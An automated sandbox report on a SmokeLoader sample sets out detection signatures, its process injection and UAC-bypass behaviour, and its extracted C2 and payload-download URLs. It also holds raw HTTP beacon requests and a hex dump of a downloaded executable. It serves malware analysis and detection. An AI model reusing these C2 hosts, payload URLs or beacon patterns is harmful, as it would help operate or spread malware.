Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:750406
MD5:8691765a5ef6354d21bd12c83e9df20b
SHA1:47b548237ced425f7f2ac209ccf0914f8980fa70
SHA256:c9b23216dc8719c25c60fe8334fa5a5c3b9ad54fcaedf94dfb18b8e8ec6cda2b
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5328 cmdline: C:\Users\user\Desktop\file.exe MD5: 8691765A5EF6354D21BD12C83E9DF20B)
    • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • FD31.exe (PID: 3720 cmdline: C:\Users\user\AppData\Local\Temp\FD31.exe MD5: 823B2BD8B63CAFBEA781C59993109B99)
        • rundll32.exe (PID: 5944 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp",Tiuqiiueaur MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • 2B26.exe (PID: 4904 cmdline: C:\Users\user\AppData\Local\Temp\2B26.exe MD5: B30C788530FD281E8C434DA4B8214DB4)
  • cgjtubb (PID: 2948 cmdline: C:\Users\user\AppData\Roaming\cgjtubb MD5: 8691765A5EF6354D21BD12C83E9DF20B)
  • 2B26.exe (PID: 1888 cmdline: "C:\Users\user\AppData\Local\Temp\2B26.exe" MD5: B30C788530FD281E8C434DA4B8214DB4)
  • cgjtubb (PID: 5404 cmdline: C:\Users\user\AppData\Roaming\cgjtubb MD5: 8691765A5EF6354D21BD12C83E9DF20B)
  • cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000011.00000002.581088904.0000000000631000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x73b1:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000011.00000002.580849383.00000000004F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 23 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      15.2.2B26.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        15.2.2B26.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
        • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x10170:$s2: Elevation:Administrator!new:
        10.2.2B26.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          10.2.2B26.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
          • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x10170:$s2: Elevation:Administrator!new:

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.4222.236.49.12349732802851815 11/20/22-23:29:42.980601
          SID:2851815
          Source Port:49732
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4190.140.74.4349706802851815 11/20/22-23:29:11.593775
          SID:2851815
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4190.147.188.5049729802851815 11/20/22-23:29:38.939202
          SID:2851815
          Source Port:49729
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4190.140.74.4349712802851815 11/20/22-23:29:17.825718
          SID:2851815
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4190.140.74.4349710802851815 11/20/22-23:29:15.417911
          SID:2851815
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4175.119.10.23149699802851815 11/20/22-23:28:59.421588
          SID:2851815
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4138.36.3.13449715802851815 11/20/22-23:29:20.999357
          SID:2851815
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4175.119.10.23149733802851815 11/20/22-23:29:44.502536
          SID:2851815
          Source Port:49733
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4222.236.49.12349721802851815 11/20/22-23:29:27.376996
          SID:2851815
          Source Port:49721
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4175.119.10.23149726802851815 11/20/22-23:29:34.630714
          SID:2851815
          Source Port:49726
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4210.182.29.7049730802851815 11/20/22-23:29:40.008032
          SID:2851815
          Source Port:49730
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4210.182.29.7049727802851815 11/20/22-23:29:36.126865
          SID:2851815
          Source Port:49727
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4222.236.49.12349714802851815 11/20/22-23:29:19.586363
          SID:2851815
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4175.119.10.23149723802851815 11/20/22-23:29:29.402513
          SID:2851815
          Source Port:49723
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4210.182.29.7049705802851815 11/20/22-23:29:10.022918
          SID:2851815
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4138.36.3.13449704802851815 11/20/22-23:29:08.366632
          SID:2851815
          Source Port:49704
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://piratia.su/tmp/URL Reputation: Label: malware
          Source: http://123.253.32.170/root2.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Wuwedteata.tmpReversingLabs: Detection: 25%
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\cgjtubbJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeJoe Sandbox ML: detected
          Source: 15.2.2B26.exe.2a8e12c.2.unpackAvira: Label: TR/Patched.Ren.Gen7
          Source: 8.2.FD31.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
          Source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004F306A CryptImportKey,_itoa,8_2_004F306A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004DA07A CryptBinaryToStringA,8_2_004DA07A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0048600C CryptReleaseContext,8_2_0048600C
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004F210A GetTokenInformation,HttpSendRequestW,CryptAcquireContextA,8_2_004F210A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004BF25C CryptBinaryToStringA,8_2_004BF25C
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B42E2 CryptDecrypt,CryptDestroyKey,8_2_004B42E2
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_005032A3 CryptImportKey,8_2_005032A3
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B6340 CryptImportKey,8_2_004B6340
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00495303 CryptImportKey,8_2_00495303
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D13C5 RegisterClassW,CryptBinaryToStringA,GetModuleHandleW,GetModuleHandleW,8_2_004D13C5
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0046F403 SetLastError,CryptAcquireContextA,Process32NextW,8_2_0046F403
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D442B CryptBinaryToStringA,8_2_004D442B
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B7495 CryptExportKey,8_2_004B7495
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B3560 CryptCreateHash,VirtualAllocEx,8_2_004B3560
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C6560 CryptBinaryToStringA,8_2_004C6560
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0049868A HttpOpenRequestW,CryptReleaseContext,8_2_0049868A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004EB7A3 CryptAcquireContextA,8_2_004EB7A3
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C497F CryptEncrypt,8_2_004C497F
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D3903 CryptBinaryToStringA,8_2_004D3903
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C49C6 CryptEncrypt,CryptEncrypt,8_2_004C49C6
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B89DC CryptAcquireContextA,8_2_004B89DC
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0048E980 CryptAcquireContextA,8_2_0048E980
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C4A53 CryptDestroyKey,CryptDestroyKey,8_2_004C4A53
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B0A6E CryptHashData,8_2_004B0A6E
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00467A70 CryptBinaryToStringA,8_2_00467A70
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004BEACF CryptImportKey,8_2_004BEACF
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D7AEB CryptBinaryToStringA,HttpSendRequestW,8_2_004D7AEB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004EEAF6 CryptAcquireContextA,8_2_004EEAF6
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004EDAAF CryptAcquireContextA,8_2_004EDAAF
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0048CC12 CryptAcquireContextA,GetProcAddress,CryptImportKey,8_2_0048CC12
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C4C3A CryptBinaryToStringA,8_2_004C4C3A

          Exploits

          barindex
          Yara detected UAC Bypass using CMSTP
          Source: Yara matchFile source: 15.2.2B26.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.2B26.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.494179230.0000000000413000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.473645142.0000000000413000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY

          Compliance

          barindex
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeUnpacked PE file: 8.2.FD31.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 10.2.2B26.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 15.2.2B26.exe.400000.0.unpack
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49716 version: TLS 1.2
          Source: Binary string: PC:\wekeledo-cilebac.pdb0_ source: file.exe, cgjtubb.4.dr
          Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 2B26.exe, 0000000A.00000002.473602771.0000000000410000.00000040.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000002.494160010.0000000000410000.00000040.00000001.01000000.0000000A.sdmp
          Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 2B26.exe, 0000000F.00000002.495056481.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.501354011.0000000002A88000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\tipalowi\48\cibo\rorijagumew\veh\jixanuwud42_goku.pdb source: 2B26.exe, 0000000A.00000000.460526248.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000000.473105275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe.4.dr
          Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 2B26.exe, 0000000F.00000002.495056481.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.501354011.0000000002A88000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\hicimusafaye.pdb source: FD31.exe, 00000008.00000000.428535544.0000000000401000.00000020.00000001.01000000.00000008.sdmp, FD31.exe.4.dr
          Source: Binary string: C:\wekeledo-cilebac.pdb source: file.exe, cgjtubb.4.dr
          Source: Binary string: TC:\hicimusafaye.pdb0_ source: FD31.exe, 00000008.00000000.428535544.0000000000401000.00000020.00000001.01000000.00000008.sdmp, FD31.exe.4.dr
          Source: Binary string: C:\tipalowi\48\cibo\rorijagumew\veh\jixanuwud42_goku.pdb0_ source: 2B26.exe, 0000000A.00000000.460526248.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000000.473105275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe.4.dr

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
          Source: C:\Windows\explorer.exeDomain query: freeshmex.at
          Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49699 -> 175.119.10.231:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49704 -> 138.36.3.134:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49705 -> 210.182.29.70:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49706 -> 190.140.74.43:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49710 -> 190.140.74.43:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49712 -> 190.140.74.43:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49714 -> 222.236.49.123:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49715 -> 138.36.3.134:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49721 -> 222.236.49.123:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49723 -> 175.119.10.231:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49726 -> 175.119.10.231:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49727 -> 210.182.29.70:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49729 -> 190.147.188.50:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49730 -> 210.182.29.70:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49732 -> 222.236.49.123:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49733 -> 175.119.10.231:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://cracker.biz/tmp/
          Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/
          Source: Malware configuration extractorURLs: http://piratia.su/tmp/
          Source: Joe Sandbox ViewASN Name: TelmexColombiaSACO TelmexColombiaSACO
          Source: Joe Sandbox ViewASN Name: TE-ASTE-ASEG TE-ASTE-ASEG
          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: Joe Sandbox ViewIP Address: 190.147.188.50 190.147.188.50
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Sun, 20 Nov 2022 22:29:04 GMTContent-Type: application/octet-streamContent-Length: 1134592Last-Modified: Sun, 20 Nov 2022 22:20:03 GMTConnection: keep-aliveETag: "637aa813-115000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 47 1a 01 67 26 74 52 67 26 74 52 67 26 74 52 79 74 e1 52 73 26 74 52 79 74 f7 52 13 26 74 52 79 74 f0 52 4b 26 74 52 40 e0 0f 52 60 26 74 52 67 26 75 52 10 26 74 52 79 74 fe 52 66 26 74 52 79 74 e0 52 66 26 74 52 79 74 e5 52 66 26 74 52 52 69 63 68 67 26 74 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 59 cd 01 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 fc 00 00 00 86 10 00 00 00 00 00 d8 51 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 12 00 00 04 00 00 77 3c 12 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 02 01 00 50 00 00 00 00 70 0f 00 68 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 11 00 ac 0a 00 00 d0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 2f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 32 fb 00 00 00 10 00 00 00 fc 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 3c 51 0e 00 00 10 01 00 00 1c 0e 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 70 02 00 00 70 0f 00 00 12 02 00 00 1c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 21 00 00 00 f0 11 00 00 22 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idgtg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iatco.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svuhccb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmevykp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pewoqsllm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: freeshmex.at
          Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhuqghmu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xwljygwi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mubvqnkrma.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wtnnoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ulhgwivcot.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pydpo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebktpqpafx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: freeshmex.at
